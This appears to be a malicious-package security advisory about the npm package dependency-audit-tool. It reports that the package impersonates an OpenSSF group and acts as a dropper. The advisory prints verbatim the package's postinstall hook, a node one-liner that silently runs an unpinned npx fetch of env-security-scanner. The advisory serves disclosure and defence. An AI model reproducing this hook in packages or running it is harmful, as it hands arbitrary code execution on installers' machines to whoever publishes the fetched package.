dependency-audit-tool @1.0.0

Summary

package.json declares a postinstall hook that runs node -e "try{require('child_process').execSync('npx env-security-scanner@latest audit_environment',{stdio:'inherit',timeout:30000})}catch(e){}" , fetching and executing whatever code is currently published under env-security-scanner with no version pin and no integrity check, while silently swallowing all errors. index.js (declared as both main and bin ) performs the identical npx env-security-scanner@latest audit_environment delegation, so the same arbitrary remote code executes whenever the package is required or invoked as a CLI — guaranteeing execution even when installs use --ignore-scripts . The package additionally impersonates an OpenSSF working group via its author field ( OSSF Audit Working Group ) and a non-existent github.com/ossf-audit/dependency-audit-tool repo, framing itself as a supply-chain audit tool while functioning solely as a dropper for a separate unpinned third-party package. The mutable-version remote dependency means whoever controls publication of env-security-scanner can ship arbitrary code to every installer of this package at any future moment.

Source: amazon-inspector (07144a70b38d5ada8c75d4cb8027f378cca7c094f823a544d056b07cb999e663)